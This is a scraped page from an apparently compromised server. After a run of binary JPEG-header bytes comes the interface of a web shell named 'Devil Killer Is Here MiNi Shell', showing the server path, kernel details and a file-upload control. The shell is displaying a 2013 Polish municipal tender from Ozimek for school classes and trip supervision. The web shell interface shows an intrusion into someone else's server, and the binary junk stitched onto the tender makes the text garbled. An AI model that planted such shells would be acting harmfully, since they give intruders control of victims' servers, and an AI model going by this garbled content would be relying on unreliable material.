JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/65680-N-2013.html

<p class="kh_header"><b>Ozimek: Przeprowadzenie zajęć edukacyjnych oraz sprawowanie opieki podczas wyjazdów edukacyjnych w projekcie pn.: Szkoła pełna pomysłów</b><br>
<b>Numer ogłoszenia: 65680 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Ozimka , ul. Ks. J. Dzierżona 4B, 46-040 Ozimek, woj. opolskie, tel. 77 46 22 869, faks 77 46 22 811.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ozimek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć edukacyjnych oraz sprawowanie opieki podczas wyjazdów edukacyjnych w projekcie pn.: Szkoła pełna pomysłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia:
Przedmiotem zamówienia jest przeprowadzenie zajęć edukacyjnych w szkołach podstawowych Gminy Ozimek oraz sprawowanie opieki podczas wyjazdów edukacyjnych uczniów i uczennic tych szkół w projekcie Szkoła pełna pomysłów.
2.	Projekt współfinansowany jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
3.	Celem głównym projektu jest wyrównanie szans edukacyjnych uczniów i uczennic w 5 wiejskich szkołach prowadzonych przez Gminę Ozimek dzięki wdrożeniu 3 elementów programu rozwojowego w latach 2013-2014 dla 119k/106m.

4.	Szczegółowy opis przedmiotu zamówienia:
Niniejsze postępowanie zostało podzielone na 62 części:

Publiczna Szkoła Podstawowa w Szczedrzyku 

Część 1: zajęcia dydaktyczno-wyrównawcze z matematyki kl. VI, 30 godzin 
w 2013 roku w roku szkolnym 2012/2013;

Część 2:  zajęcia - wykorzystanie technologii ICT w rozwijaniu zdolności matematycznych, 2013 r. - 26 godzin, 2014 r. - 34 godziny; łącznie 60 godzin w roku szkolnym 2013/2014;


Część 3: 
-zajęcia z doskonalenia kompetencji językowych poprzez pracę 
w gazetce szkolnej, 2013 r. - 56 godzin (30 godzin w roku szkolnym 2012/2013                 i 26 godzin w roku szkolnym 2013/2014), 2014 r. - 34 godziny w roku szkolnym 2013/2014; łącznie 90 godzin;
-opieka podczas wyjazdu uczniów do teatru w Opolu - w VI 2013 roku; przewidywany czas do 5 godzin oraz wyjazdu do teatru do Gliwic 
w I 2014 roku, przewidywany czas  do 5 godzin, łącznie 10 godzin;
-opieka podczas 2 wyjazdów do Bierkowic - Muzeum Wsi Opolskiej łącznie 10 godzin w V i X 2013 roku;

Część 4:  
-zajęcia: nauka języka angielskiego poprzez teatr - dodatkowe zajęcia pozalekcyjne i pozaszkolne; 2013r. - 56 godzin (30 godzin w roku szkolnym 2012/2013 i 26 godzin w roku szkolnym 2013/2014), 2014r. - 34 godziny w roku szkolnym 2013/2014; łącznie 90 godzin;
-opieka podczas wyjazdu uczniów do teatru w Opolu - w VI 2013 roku; przewidywany czas do 5 godzin oraz wyjazdu do teatru do Gliwic 
w I 2014 roku, przewidywany czas  do 5 godzin, łącznie 10 godzin;
-opieka podczas 2 wyjazdów do Bierkowic- Muzeum Wsi Opolskiej łącznie 10 godzin w V i X 2013 roku;

Część 5:  
-zajęcia: Żyj kolorowo warsztaty plastyczne, 2013r. - 56 godzin (30 godzin 
w roku szkolnym 2012/2013 i 26 godzin w roku szkolnym 2013/2014), 
2014r. - 34 godziny w roku szkolnym 2013/2014; łącznie 90 godzin;
-opieka podczas wyjazdu uczniów do teatru w Opolu - w VI 2013 roku; przewidywany czas do 5 godzin oraz wyjazdu do teatru do Gliwic 
w I 2014 roku, przewidywany czas  do 5 godzin, łącznie 10 godzin;
-opieka podczas 2 wyjazdów do Bierkowic- Muzeum Wsi Opolskiej łącznie 10 godzin w V i X 2013 roku;

Część 6: zajęcia dydaktyczno - wyrównawcze z matematyki kl. V; 2013r. - 
26 godzin w roku szkolnym 2013/2014, 2014r. - 34 godziny w roku szkolnym 2013/2014; łącznie 60 godzin;

Część 7: opieka podczas 45 wyjazdów na basen; 27 wyjazdów w 2013 roku 
(15 wyjazdów w roku szkolnym 2012/2013 a 12 w roku szkolnym 2013/2014) 
i 18 wyjazdów w 2014 roku w roku szkolnym 2013/2014, łącznie 90 godzin;

Część 8: opieka podczas 45 wyjazdów na basen 27 wyjazdów w 2013 roku 
(15 wyjazdów w roku szkolnym 2012/2013 a 12 w roku szkolnym 2013/2014) 
i 18 wyjazdów w 2014 roku w roku szkolnym 2013/2014, łącznie 90 godzin;

Część 9: opieka podczas wyjazdu uczniów do teatru w Opolu - w VI 2013 roku; przewidywany czas do 5 godzin oraz wyjazdu do teatru do Gliwic 
w I 2014 roku, przewidywany czas do 5 godzin, łącznie 10 godzin;
	
Część 10: opieka podczas 2 wyjazdów do Bierkowic- Muzeum Wsi Opolskiej łącznie          10 godzin w V i X 2013 roku;

Szkoła Podstawowa w Krasiejowie 

Część 11: zajęcia dydaktyczno-wyrównawcze z matematyki, 2013r. - 24 godziny, z czego 15 godzin w roku szkolnym 2012/2013, a 9 godzin w roku szkolnym 2013/2014;  2014r. - 12 godzin w roku szkolnym 2013/2014; łącznie 36 godzin;

Część 12: 
-zajęcia pozalekcyjne i pozaszkolne ukierunkowane na j. obce -Poznajemy kulturę i literaturę krajów anglosaskich; 2013r. - 20 godzin, z czego 11 godzin w roku szkolnym 2012/2013 a 9 godzin w roku szkolnym 2013/2014; 2014 - 10 godzin w roku szkolnym 2013/2014; łącznie 30 godzin;
-opieka podczas 2 wyjazdów do biblioteki językowej w Opolu w IV 2013 roku i w X 2013, każdy wyjazd po 4 godziny, łącznie 8 godzin;
-opieka podczas wyjazdu do teatru na sztukę anglojęzyczną - 6 godz. 
w XII 2013 roku;
-opieka podczas 2 wyjazdów w I i V 2014 roku do Opola na lekcje 
z native speakerem; po 4 godziny na wyjazd, łącznie 8 godzin;

Część 13: 
-zajęcia dydaktyczno-wyrównawcze z j. polskiego -Aby język giętki...potrafił i chciał- 2013r. - 20 godzin, z czego 13 godzin w roku szkolnym 2012/2013, a 7 godzin w roku szkolnym 2013/2014; 2014r. - 10 godzin w roku szkolnym 2013/2014; łącznie 30 godzin;  
-opieka podczas wyjazdu do teatru  w Opolu w V 2013 roku, 6 godzin
-opieka podczas wyjazdu na projekcję filmu w Opolu w X 2013 roku, 
6 godzin;
-opieka podczas wyjazdu do Muzeum Śląska Opolskiego w IV 2014 roku, 6 godzin;

Część 14: 
-zajęcia -Poszukiwacze skarbów - innowacyjne formy nauczania - architektoniczne i językowe; 11 w roku szkolnym 2012/2013, a 9 w roku szkolnym 2013/2014 łącznie w roku 2013  20 godzin;
-opieka podczas wyjazdu do Biblioteki Wojewódzkiej w Opolu w IV 2014 roku, 5 godzin;
-opieka podczas wyjazdu do Brzegu w V 2014 roku, 5 godzin;
-opieka podczas wyjazdu do Moszna - Rogów Opolski - Kamień Śląski w V 2014 roku,     5 godzin;

Część 15: 
-zajęcia z j. ojczystego niemieckiego -Bliżej tradycji, obyczajów, uroczystości naszej małej ojczyzny - 2013r. - 2 godziny w roku szkolnym 2012/2013, 2014r. - 8 godzin w roku szkolnym 2013/2014; łącznie 10 godzin;
-opieka podczas wyjazdu do biblioteki językowej w Opolu w IV 2013 roku, 4 godziny;
-opieka  podczas dwóch wyjazdów do Bierkowic 4 godziny w XII 2013 roku i  4 godziny w IV 2014 roku, łącznie 8 godzin;
-opieka podczas wyjazdu do gospodarstwa agroturystycznego w X 2013 roku                4 godziny;

Część 16: zajęcia - doradztwo i opieka pedagogiczna w roku szkolnym 2012/2013 -            9 godzin;

Część 17: opieka podczas 15 wyjazdów na basen - innowacyjne formy nauczania po 2 godz. każdy wyjazd, łącznie 30 godzin w 2013 roku (IX - 4 wyjazdy, X - 5 wyjazdów, XI - 4 wyjazdy, XII - 2 wyjazdy);

Część 18: opieka podczas 15 wyjazdów na basen - innowacyjne formy nauczania po 2 godz. każdy wyjazd, łącznie 30 godzin w 2013 (IX - 4 wyjazdy, X - 5 wyjazdów, XI - 4 wyjazdy, XII - 2 wyjazdy);

Część 19: opieka podczas 2 wyjazdów do biblioteki językowej w Opolu 
w IV 2013 roku i w X 2013, każdy wyjazd po 4 godziny, łącznie 8 godzin;

Część 20: opieka podczas wyjazdu do teatru na sztukę anglojęzyczną - 
6 godz. w XII 2013 roku;

Część 21: opieka podczas 2 wyjazdów w I i V 2014 roku do Opola na lekcje 
z native speakerem; po 4 godziny na wyjazd, łącznie 8 godzin

Część 22: opieka podczas wyjazdu do biblioteki językowej w Opolu w IV 2013 roku,               4 godziny;

Część 23: opieka  podczas dwóch wyjazdów do Bierkowic 4 godziny 
w XII 2013 roku i  4 godziny w IV 2014 roku, łącznie 8 godzin;

Część 24: opieka podczas wyjazdu do gospodarstwa agroturystycznego 
w X 2013 roku 4 godziny;

Publiczna Szkoła Podstawowa w Grodźcu 

Część 25: zajęcia dydaktyczno-wyrównawcze z języka polskiego; 2013-10 godzin w roku szkolnym 2012/2013 , 2014-20 godzin w roku szkolnym 2013/2014; łącznie 30 godzin;

Część 26: zajęcia dydaktyczno-wyrównawcze z języka polskiego; 2013-10 godzin w roku szkolnym 2013/2014, 2014-20 godzin w roku szkolnym 2013/2014; łącznie 30 godzin;

Część 27: zajęcia dydaktyczno-wyrównawcze z matematyki; 2013-10 godzin w roku szkolnym 2012/2013, 2014-20 godzin w roku szkolnym 2013/2014; łącznie 30 godzin;

Część 28: zajęcia dydaktyczno-wyrównawcze z matematyki; 2013-10 godzin w roku szkolnym 2013/2014; 2014-20 godzin w roku szkolnym 2013/2014; łącznie 30 godzin;

Część 29: zajęcia logopedyczne; 2013-10 godzin, 2014-10 godzin; łącznie 20 godzin w roku szkolnym 2013/2014;

Część 30: 
-zajęcia matematyczno-przyrodnicze (dodatkowe zajęcia pozalekcyjne i pozaszkolne); 2013r. - 15 godzin; 2014r. - 25 godzin; łącznie 40 godzin 
w roku szkolnym 2013/2014;
-opieka podczas wyjazdu do Izby Leśnej w Kupach w IX 2013 roku 
5 godzin;
-opieka podczas wyjazdu do Centrum Nauk Kopernik w Warszawie we IX 2013 roku,  10 godzin;
Część 31: 
-zajęcia pozalekcyjne i pozaszkolne ukierunkowane na język niemiecki; 2013r. - 8 godzin, 2014r. - 12 godzin; łącznie 20 godzin w roku szkolnym 2013/2014;
-opieka podczas wyjazdu do Biblioteki Austriackiej w Opolu w XII 2013 
4 godziny;
-opieka podczas wyjazdu do Biblioteki Austriackiej w Opolu w V 2014
4 godziny;

Część 32: 
-zajęcia historyczne (dodatkowe zajęcia pozalekcyjne i pozaszkolne); 2013- 15 godzin, 2014 - 15 godzin; łącznie 30 godzin w roku szkolnym 2013/2014;
-opieka podczas wyjazdu do Grodu Rycerskiego w Byczynie w IX 2013 roku - 5 godzin;
-opieka podczas wyjazdu do Centrum Nauk Kopernik w Warszawie we IX 2013 roku,   10 godzin;

Część 33: zajęcia pozalekcyjne i pozaszkolne z języka angielskiego; 2013 - 
15 godzin, 2014 - 15 godzin; łącznie 30 godzin w roku szkolnym 2013/2014;

Część 34: 
-zajęcia sportowe; 2013 - 15 godzin w roku szkolnym 2012/2013, 2014 - 
15 godzin w roku szkolnym 2013/2014; łącznie 30 godzin;
-opieka podczas 5 (XI i XII 2013) wyjazdów na lodowisko  w roku szkolnym 2013/2014 - łącznie 15 godzin;
-opieka podczas 15 wyjazdów na basen w 2014 roku w II - 2 wyjazdy, III - 4 wyjazdy, IV - 3 wyjazdy, V - 3 wyjazdy, VI - 3 wyjazdy, łącznie 
30 godzin;

Część 35: 
-zajęcia plastyczne (dodatkowe zajęcia pozalekcyjne i pozaszkolne); 2013 - 8 godzin, 2014 - 12 godzin; łącznie 20 godzin w roku szkolnym 2013/2014;
-opieka podczas wyjazdu do Muzeum Wsi Opolskiej -w XI 2013 roku, 
5 godzin;
-opieka podczas wyjazdu do Muzeum Wsi Opolskiej -w III 2014 roku, 
5 godzin;

Publiczna Szkoła Podstawowa w Dylakach 

Część 36: zajęcia dydaktyczno-wyrównawcze z matematyki; 2013 - 30 godzin z czego 10 godzin w roku szkolnym 2012/2013, a 20 godzin w roku szkolnym 2013/2014, 2014 - 30 godzin w roku szkolnym 2013/2014; łącznie 60 godzin;

Część 37: zajęcia dydaktyczno-wyrównawcze z języka polskiego; 2013 - 
30 godzin, z czego 10 godzin w roku szkolnym 2012/2013, a 20 godzin w roku szkolnym 2013/2014, 2014 - 30 godzin; łącznie 60 godzin;

Część 38: zajęcia dydaktyczno-wyrównawcze z języka angielskiego; 2013 - 
20 godzin, 2014 - 30 godzin; łącznie 50 godzin w roku szkolnym 2013/2014;

Część 39: doradztwo i opiekę psychologiczno-pedagogiczną; 2013 - 
9 godzin, z czego 7 godzin w roku szkolnym 2012/2013, a 2 godziny w roku szkolnym 2013/2014, 2014 - 6 godzin w roku szkolnym 2013/2014; łącznie 
15 godzin;

Część 40: 
-zajęcia pozalekcyjne i pozaszkolne - kółko matematyczno-przyrodnicze; 2013 - 10 godzin, 2014 - 15 godzin; łącznie 25 godzin w roku szkolnym 2013/2014;
-opieka podczas 2 wycieczek na Górę św. Anny w IX 2013 i V 2014 roku; łącznie              10 godzin; 

Część 41: 
-dodatkowe zajęcia pozalekcyjne i pozaszkolne - kółko filmowo-teatralne; 2013 - 10 godzin, 2014 - 15 godzin; łącznie 25 godzin w roku szkolnym 2013/2014;
-opieka podczas 2 wyjazdów do teatru im. Jana Kochanowskiego 
w Opolu w X 2013 roku i III 2014 roku; łącznie 10 godzin;

Część 42: zajęcia dla uczniów zdolnych z języka angielskiego; 2013 - 
20 godzin, 2014 - 30 godzin; łącznie 50 godzin w roku szkolnym 2013/2014;

Część 43: opieka podczas 2 wycieczek na Górę św. Anny w IX 2013 i V 2014 roku; łącznie 10 godzin; 

Część 44: opieka podczas wyjazdu do Centrum Nauk Kopernik w Warszawie w V 2014 roku; łącznie 10 godzin;

Część 45: opieka podczas wyjazdu do Centrum Nauk Kopernik w Warszawie w V 2014 roku; łącznie 10 godzin;

Część 46: opieka podczas wyjazdu do Centrum Nauk Kopernik w Warszawie w V 2014 roku; łącznie 10 godzin;

Szkoła Podstawowa w Antoniowie 

Część 47: zajęcia wyrównawcze z języka polskiego -W labiryncie ortografii; 2013- 30 godzin z czego 17 godzin w roku szkolnym 2012/2013 i 13 godzin 
w roku szkolnym 2013/2014, 2014 - 20 godzin w roku szkolnym 2013/2014; łącznie               50 godzin;

Część 48: zajęcia wyrównawcze z języka polskiego -W labiryncie ortografii; 2013- 30 godzin z czego 17 godzin w roku szkolnym 2012/2013 i 13 godzin 
w roku szkolnym 2013/2014, 2014 - 20 godzin w roku szkolnym 2013/2014; łącznie                  50 godzin;

Część 49:  zajęcia z terapii logopedycznej; 2013 - 20 godzin, z czego 13 godzin w roku szkolnym 2012/2013 i 7 godzin w roku 2013/2014; 2014 - 10 godzin 
w roku szkolnym 2013/2014; łącznie 30 godzin;

Część 50:  zajęcia rewalidacji indywidualnej; 2013 - 30 godzin z czego 
16 godzin w roku szkolnym 2012/2013, a 14 godzin w roku szkolnym 2013/2014, 2014 - 30 godzin w roku szkolnym 2013/2014; łącznie 60 godzin;

Część 51: zajęcia z języka polskiego przygotowujące do sprawdzianu - dodatkowe zajęcia pozalekcyjne i pozaszkolne; 2013 - 20 godzin z czego 
8 godzin w roku szkolnym 2012/2013, a 12 godzin w roku szkolnym 2013/2014; 2014 - 15 godzin w roku szkolnym 2013/2014; łącznie 35 godzin;

Część 52: zajęcia z matematyki -przygotowujące do sprawdzianu - dodatkowe zajęcia pozalekcyjne i pozaszkolne; 2013 - 20 godzin, z czego 
7 godzin w roku szkolnym 2012/2013, a 13 godzin w roku szkolnym 2013/2014; 2014 - 15 godzin w roku szkolnym 2013/2014; łącznie 35 godzin;

Część 53: zajęcia warsztaty językowo-przyrodnicze - dodatkowe zajęcia pozalekcyjne i pozaszkolne 16 godzin w 2013 roku, z czego 8 godzin w roku szkolnym 2012/2013, a 8 godzin w roku szkolnym 2013/2014 i 10 godzin w 2014 roku w roku szkolnym 2013/2014 -            26 godzin;

Część 54: zajęcia warsztaty językowo-przyrodnicze - dodatkowe zajęcia pozalekcyjne i pozaszkolne 16 godzin w 2013 roku, z czego 8 godzin w roku szkolnym 2012/2013, a 8 godzin w roku szkolnym 2013/2014 i 10 godzin w 2014 roku w roku szkolnym 2013/2014 -        26 godzin;

Część 55: 
-zajęcia  -Przyroda w obiektywie - informatyczno -przyrodnicze warsztaty fotografii cyfrowej - dodatkowe zajęcia pozalekcyjne; 2013 - 25 godzin, z czego 12 godzin w roku szkolnym 2012/2013 i 13 godzin w roku szkolnym 2013/2014; 2014 - 13 godzin w roku szkolnym 2013/2014; łącznie 38 godzin;
-opieka podczas warsztatów edukacji przyrodniczej na Górze św. Anny w V 2013 roku - 5 godzin;
-opieka podczas wyjazdu do Wrocławia (ogród botaniczny)  - wyjazdowe formy pracy warsztatowej w V  2014 roku - 7 godzin;
-opieka podczas wyjazdu do zoo w Opolu - wyjazdowe formy pracy warsztatowej w X 2013 - 6 godzin;

Część 56: 
-zajęcia  -Na tropach przyrody - warsztaty przyrodnicze; 2013 - 
20 godzin, z czego 12 godzin w roku szkolnym 2012/2013 i 8 godzin 
w roku szkolnym 2013/2014, 2014 - 15 godzin w roku szkolnym 2013/2014; łącznie           35 godzin;
-opieka podczas 3 warsztatów edukacji przyrodniczej na Górze św. Anny w V 2013 roku, I 2014 roku i III 2014 roku - łącznie 15 godzin;
-opieka podczas wyjazdu do Wrocławia (ogród botaniczny)  - wyjazdowe formy pracy warsztatowej w V  2014 roku - 7 godzin;
-opieka podczas wyjazdu do zoo w Opolu - wyjazdowe formy pracy warsztatowej w X 2013 - 6 godzin;

Część 57: zajęcia  - Mistrzowie unihokeja; 2013 - 35 godzin, z czego 20 godzin w roku szkolnym 2012/2013 i 15 godzin w roku szkolnym 2013/2014, 2014 - 
25 godzin w roku szkolnym 2013/2014; łącznie 60 godzin;

Część 58: zajęcia  -gimnastyka korekcyjna; 2013 - 30 godzin, z czego 
15 godzin w roku szkolnym 2012/2013 i 15 godzin w roku szkolnym 2013/2014;  2014 - 20 godzin w roku szkolnym 2013/2014; łącznie 50 godzin;
Część 59: zajęcia psychoedykacyjne (doradztwo i opieka pedagogiczno-psychologiczna); 2013 - 20 godzin, z czego 11 godzin w roku szkolnym 2012/2013 i 9 godzin w roku szkolnym 2013/2014, 2014 - 15 godzin w roku szkolnym 2013/2014; łącznie  35 godzin;

Część 60: zajęcia  poradnictwo psychologiczno-pedagogiczne; 2013 - 
16 godzin, z czego 9 godzin w roku szkolnym 2012/2013 i 7 godzin w roku szkolnym 2013/2014; 2014 - 12 godzin w roku szkolnym 2013/2014; łącznie 
28 godzin;

Część 61: opieka podczas 15 wyjazdów na basen (łącznie 45 godzin opieki); 5 wyjazdów w roku szkolnym 2012/2013 i 10 wyjazdów w roku szkolnym 2013/2014, z czego 4 wyjazdy w 2013 roku i 6 wyjazdów w 2014 roku;

Część 62: opieka podczas 15 wyjazdów na basen (łącznie 45 godzin opieki); 5 wyjazdów w roku szkolnym 2012/2013 i 10 wyjazdów w roku szkolnym 2013/2014, z czego 4 wyjazdy w 2013 roku i 6 wyjazdów w 2014 roku;

5.	Wykonawca może złożyć ofertę na jedną lub więcej części.  

6.	W ramach prowadzenia zajęć, o których mowa w pkt. 1 Wykonawca zobowiązany jest również do: 
1)	współpracy z dyrektorem szkoły podstawowej oraz koordynatorem projektu,
2)	przygotowania w formie pisemnej w terminie 2 dni od daty zawarcia umowy programu i planu pracy zajęć pozalekcyjnych(zajęcia prowadzone mogą być wyłącznie w czasie wolnym od lekcji obowiązkowych z wyłączeniem ferii i dni świątecznych), obejmującego harmonogram oraz zakres zadania dla uczestników projektu  pn.:Szkoła pełna pomysłów dla określonego typu zajęć i przedstawienia do akceptacji dyrektorowi szkoły, a następnie koordynatorowi projektu,
3)	realizacji zajęć zgodnie z opracowanym programem zaakceptowanym przez dyrektora szkoły i koordynatora projektu,
4)	przekazywania konspektu zajęć koordynatorowi projektu,
5)	realizacji zajęć zgodnie z celem głównym i celami szczegółowymi projektu,
6)	przestrzegania obowiązków, zaleceń i terminów wynikających z realizacji umowy; opieka nad uczniami podczas zajęć, dbanie o bezpieczeństwo uczniów,
7)	sprawowania opieki nad uczniami na organizowanych wyjazdach edukacyjnych, jeśli zajęcia takie wyjazdy przewidują,
8)	wspomagania promocji i ewaluacji projektu- w szczególności informowania                         o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpracy z dyrektorem szkoły i koordynatorem projektu w mierzeniu postępu uczniów w zakresie rezultatów projektu,
9)	dbałości o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu,
10)	zwiększenia motywacji do nauki przez uczniów uczestniczących w projekcie,
11)	bieżącego monitorowania  efektów zajęć i raportowanie o stanie realizacji zajęć,
12)	umożliwienia uczestnictwa rodziców w zajęciach, informowania rodziców o postępach dziecka, ankietowania rodziców w trakcie trwania projektu w celu analizy postępów dzieci (treść ankiety zostanie uzgodniona wcześniej z koordynatorem projektu),
13)	wystawienia opinii dla każdego ucznia dwa razy w semestrze nt. stopnia zaspokojenia zdiagnozowanych indywidualnych potrzeb edukacyjnych uczniów,
14)	rzetelnego prowadzenia dokumentacji z realizowanych zajęć i wyjazdów edukacyjnych, jeśli zajęcia takie wyjazdy przewidują - dzienników zajęć i innych wymaganych dokumentów ( listy obecności, karty czasu pracy, dokumentacji zdjęciowej) 
15)	przygotowania materiałów do przeprowadzenia zajęć we własnym zakresie,
16)	stosowania we wszystkich materiałach logotypów Unii Europejskiej i Programu Operacyjnego Kapitał Ludzki zgodnie z księgą wizualizacji znajdującej się na stronie internetowej www.pokl.opole.pl
17)	informowanie na bieżąco koordynatora projektu lub asystenta koordynatora projektu o wszystkich zaistniałych problemach w realizacji projektu,
18)	informowania dyrektora szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem,
19)	przeniesienia na rzecz zleceniodawcy praw autorskich majątkowych do opracowanych materiałów,
20)	oznaczenia sal, w których prowadzone są zajęcia logotypami Unii Europejskiej,
21)	niezwłocznego udostępnienia dokumentacji z zakresu realizacji umowy na żądanie uprawnionemu przedstawicielowi Zamawiającego, dyrektorowi szkoły, organowi kontrolującemu,
22)	zaspokojenia potrzeb chłopców i dziewcząt bez ograniczeń wynikających z płci - obowiązek uwzględniania w trakcie zajęć zasady równości szans w przekazywanych treściach.
23)	udostępniania całej dokumentacji z zakresu realizacji umowy (np. prac uczniów wytworzonych w trakcie powadzonych zajęć) na żądanie uprawnionemu przedstawicielowi Zamawiającego, Dyrektorowi Szkoły, organowi kontrolującemu, 
